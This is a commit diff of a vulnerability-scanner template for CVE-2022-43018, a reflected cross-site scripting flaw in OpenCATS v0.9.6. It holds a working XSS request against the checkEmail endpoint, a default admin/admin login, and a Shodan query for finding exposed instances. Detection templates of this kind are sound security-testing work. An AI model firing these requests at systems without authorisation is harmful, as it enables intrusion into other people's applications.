Update CVE-2022-43018.yaml

patch-1
Ritik Chaddha 2022-10-25 14:19:36 +05:30 committed by GitHub
parent b65e71cb8a
commit 2a91306bb4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 6 deletions

View File

@ -1,18 +1,18 @@
id: CVE-2022-43018
info:
name: OpenCATS - Cross Site Scripting
name: OpenCATS v0.9.6 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the email parameter in the Check Email function.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43018
- https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_checkEmail.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-43018
metadata:
verified: true
shodan-query: title:"OpenCATS"
tags: cve,cve2022,xss,opencats
tags: cve,cve2022,xss,opencats,authenticated
requests:
- raw:
@ -21,14 +21,19 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=admin
username={{username}}&password={{password}}
- |
GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=<script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
payloads:
username:
- admin
password:
- admin
attack: pitchfork
cookie-reuse: true
matchers-condition: and
matchers: